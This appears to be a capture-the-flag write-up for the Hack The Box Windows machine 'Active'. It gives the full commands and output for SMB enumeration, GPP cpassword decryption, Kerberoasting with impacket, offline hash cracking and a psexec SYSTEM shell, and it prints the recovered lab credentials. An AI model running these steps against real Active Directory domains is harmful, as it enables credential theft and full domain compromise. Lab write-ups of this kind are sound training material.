Active, a easy Windows machine that begins with simple SMB enumeration that leads to us finding a Groups.xml file which has been created due to a Group Policy Preference (GPP). This file contains a username and a password that is encrypted with AES-256 however Microsoft release the key allowing us to decrypt the password. Once we’ve decrypted the password we can SMB in and grab the user flag, from there we can use Kerberoasting to grab a token and crack it to get a password for Administrator. Allowing us to root the machine.
Enumeration
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat full_nmap.nmap
# Nmap 7.91 scan initiated Fri Sep 10 07:56:37 2021 as: nmap -sC -sV -p- -oA full_nmap 10.129.218.176
Nmap scan report for 10.129.218.176
Host is up (0.024s latency).
Not shown: 65513 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-10 11:57:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
53715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-09-10T11:58:08
|_ start_date: 2021-09-10T11:54:44
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 10 07:58:16 2021 -- 1 IP address (1 host up) scanned in 99.23 seconds
The services to note from the full port scan are as follow; DNS, SMB, RPC, NetBIOS, and LDAP. We can see that the LDAP domain is active.htb, which I’ll add within /etc/hosts.
Foothold
Begin by looking at low hanging fruits, meaning to search for CVE’s and public exploits for service versions. Searching for Microsoft DNS 6.1.7601 didn’t yield and good results nor did any exploits for Windows Server 2008 R2 SP1.
So no public exploit meaning the box isn’t going to be a one click box. The next two services I’m going to attempt to enumerate for credentials or some information is both RPC and SMB.
rpcclient
Attempting to RPC in using NULL authentication rpcclient -U "" -N active.htb which means it is testing to see if null session authentication is enabled on this machine. This does seem to be enabled however we can’t successfully run any commands such as enumdomusers which can return a list of users on the machine.
SMB
Using smbmap we can see if we can access any shares by running smbmap -H active.htb leading to these results.
1
2
3
4
5
6
7
8
9
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS
We can now use smbclient to initiate a connection to the Replication share and looked around every directory possible until finding an interesting file.
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5217064 blocks available
After looking in pretty much every directory I came across a Groups.xml file which was located in the path \active.htb\Policies\{31B2F340-016D-11D2-945F 00C04FB984F9}\MACHINE\Preferences\Groups\. Using smbclient we can initiate a connection to the share and fetch the file onto our local machine using the command get.
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> cd active.htb\
smb: \active.htb\> cd Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
10459647 blocks of size 4096. 5210051 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (7.9 KiloBytes/sec) (average 7.9 KiloBytes/sec)
User
We’ve now fetched a file named Groups.xml onto our local machine so let’s take a look at the content of it.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat Groups.xml 130 ⨯
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>
The most important aspect of this file is the username userName="active.htb\SVC_TGS" and the passwordcpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ". We can see that it is a cpassword and it looks like it’s encrypted. So we can’t utilise these credentials until we find a way to decrypt them.
Searching the term Windows cpassword brings up a few articles around cPassword and I found and read this one which was the biggest help. The article also explains what this Groups.xml file is and why it stores these credentials. Microsoft released “Group Policy Preferences” (GPP) in 2008 and one of it’s most useful features is the ability to store and use credentials in different scenarios. So when a new GPP is created, it will create an associated XML file with the username and password but the password is AES-256 bit encrypted which in theory means it would be impossible to decrypt without knowing the key. However the key was published by Microsoft allowing us to decrypt the password.
To decrypt the password Kali linux which is the distro I’m using all ready has an inbuilt script.
1
2
3
┌──(kali㉿kali)-[~/HTB/Active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
We’ve now got some credentials SVC_TGS:GPPstillStandingStrong2k18. So let’s try and connect to the SMB server with some credentials now.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbmap -H 10.129.219.97 -u SVC_TGS -p GPPstillStandingStrong2k18 2 ⨯
[+] IP: 10.129.219.97:445 Name: 10.129.219.97
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Comparing this output to when we had no credentials we can see that we can read a few more shares. Connecting to the Users share leads to us being able to grab the user.txt flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Users -U SVC_TGS%GPPstillStandingStrong2k18 130 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5203621 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5203621 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5203621 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
Root
We’ve now got credentials so we need to try and see what we can do from here. Something I always try is Kerbroasting as we know it’s running an active directory environment from the fact that it’s got LDAP running. Kerbroasting works as we’ve got a valid domain user, allowing us to request a Kerberos service ticket for any service. We then capture that and can crack it offline.
We are going to use a impacket script called GetUserSPNs which means it will fetch a Kerberos Service Principle Name (SNP) ticket. This will work if there are any user accounts on the machine that have a service principle name. So we can attempt to run the script and see if we get anything back.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Active]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.219.97 active.htb/SVC_TGS -outputfile hashes.kerberoast
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-22 03:42:30.615553
The script has been successful as there is a user account called Administrator that has a SPN. Taking a look at the output file.
1
2
3
┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat hashes.kerberoast
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d9148716dad09344e8cfceadbbc25de7$cfc95ebf86b515db7ab581e54d81fabdbb6f67f39d4305b49175a7f376acd8d89b370ecae17205e41ae478fdafe88318b203637d3a04b253e09e1b276fa66632404b559d46862aa9a75f109a0088438f6eb3a1fa4c142e6d72828e39b983ca4f1d5dd36d72dba59b5ee858b6523ee7fda21a4df438dfce7344b7234c14c95a00285c4133c78b8ded890bacbd6da206e55ae72db4e483c1106ce8dcb13d5fc114b0f577b12a0b523f5f69e2f1cb217d5d5d355cc603e7f3a30139511551f72e4b91d3eb471386caf2b409faede5f8fa661fe36434cec364e4cf4d5fa0299c1689caccbf91b2bad357f0b2371f1e6c5738397ccda91160eccb55bd839da85b4da690889c715e701b3b2cee0e6d35b695b66f7268381cefb3a1bc2b38bdce3048b12917914816671e8d1c4a6efcf39b4ead4b4f31450c58dbb99df27b6b2d866ff3025e79166c432baf98e9580a31a432430792d421f4a23e4b2669ce476c6022e995e49d5fc12104a8481d9a69d7051ddb8779ef6610e02184b7463e15b9d591225d466a568ebfdcc7f1c013f3218a18b2d987251bdcc31078bbf30681db0ec1a0eef5886d332e8b79a093b6bdaac6e512c420047722b32b182a8c8ccda18e95e43cf0f946e19355ef62339d8095563cd95e1ef65ed202002bd352354999d9043878c9dea6bbf896369cc92d39fe077e5bee4a0dfb0c67ea6621b4f1789e44386ec53a34bc7a6941285223a0219080411f933477238d22ba4778a95070d652205c8dedc8840b4f444017b467d9f9117fe45800fa41e7696739c03ef5af9d96776afa9b6c21dcff592747a19e899c01d2770f825240647b3c14741ba5c2797a57924023e07bfae3ffd0c504fad18c1a1d9da1042c84fe1e4228d417f6cbe8bee3b6025c078b0ab633094ea84b201bce9a2664f2a151e061538b76fbc761c7926bd19b306b2e3796f32d3f32fd72c1eb1fe29c3464016f5386c86b97b22bee906ecfd84cebb6cef8355de3c10b167710ac7f3a51bf5a8d52e09ac8248435a9a74b71cefa9769ac5cfccbc24425d6dda42e9673a46dade4aeed4858f667bf54a38d1042b642c960e929c86efcd1cf372c0f79f17f2b5a66018c4c70c6d9434681cea9a58508267f7b63d33b9fe299dd4c2754688e68532d0c881265320076eb5ec4d7c15208c5f00353cc945651d2e6a76d7706ba00353e606466713dafa1101f9452ea2d802779e067b4b36ab68d4ff9fd1e420b307b88482d94b39a
We can see the kerberoast hash that I’ll crack with by running john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast. With the cracked password being Ticketmaster1968.
We’ve now got another set of credentials Administrator:Ticketmaster1968 which we can try and use to authenticate via SMB.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Users -U Administrator%Ticketmaster1968 130 ⨯
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5203333 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
. D 0 Mon Jul 16 06:14:21 2018
.. D 0 Mon Jul 16 06:14:21 2018
AppData DHn 0 Mon Jul 16 06:14:15 2018
Application Data DHSrn 0 Mon Jul 16 06:14:15 2018
Contacts DR 0 Mon Jul 30 09:50:10 2018
Cookies DHSrn 0 Mon Jul 16 06:14:15 2018
Desktop DR 0 Thu Jan 21 11:49:47 2021
Documents DR 0 Mon Jul 30 09:50:10 2018
Downloads DR 0 Thu Jan 21 11:52:32 2021
Favorites DR 0 Mon Jul 30 09:50:10 2018
Links DR 0 Mon Jul 30 09:50:10 2018
Local Settings DHSrn 0 Mon Jul 16 06:14:15 2018
Music DR 0 Mon Jul 30 09:50:10 2018
My Documents DHSrn 0 Mon Jul 16 06:14:15 2018
NetHood DHSrn 0 Mon Jul 16 06:14:15 2018
NTUSER.DAT AHSn 524288 Fri Jan 22 03:44:25 2021
ntuser.dat.LOG1 AHS 262144 Sat Sep 11 11:01:04 2021
ntuser.dat.LOG2 AHS 0 Mon Jul 16 06:14:09 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 06:14:15 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018
NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 06:14:15 2018
ntuser.ini HS 20 Mon Jul 16 06:14:15 2018
Pictures DR 0 Mon Jul 30 09:50:10 2018
PrintHood DHSrn 0 Mon Jul 16 06:14:15 2018
Recent DHSrn 0 Mon Jul 16 06:14:15 2018
Saved Games DR 0 Mon Jul 30 09:50:10 2018
Searches DR 0 Mon Jul 30 09:50:10 2018
SendTo DHSrn 0 Mon Jul 16 06:14:15 2018
Start Menu DHSrn 0 Mon Jul 16 06:14:15 2018
Templates DHSrn 0 Mon Jul 16 06:14:15 2018
Videos DR 0 Mon Jul 30 09:50:10 2018
10459647 blocks of size 4096. 5203333 blocks available
smb: \Administrator\> cd Desktop\
smb: \Administrator\Desktop\> ls
. DR 0 Thu Jan 21 11:49:47 2021
.. DR 0 Thu Jan 21 11:49:47 2021
desktop.ini AHS 282 Mon Jul 30 09:50:10 2018
root.txt A 34 Sat Jul 21 11:06:07 2018
10459647 blocks of size 4096. 5203333 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
We’ve now obtained the root.txt file however we don’t have a full shell. In theory a shell could be obtained through the use of crackmapexec and where I could execute a command that would fetch netcat and then connect back to me. But this entire process can be simplified through the use of psexec.
A root shell was successfully achieved using psexec.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB/Active]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator@10.129.219.97 1 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.219.97.....
[*] Found writable share ADMIN$
[*] Uploading file QbXsCvhk.exe
[*] Opening SVCManager on 10.129.219.97.....
[*] Creating service LEgl on 10.129.219.97.....
[*] Starting service LEgl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system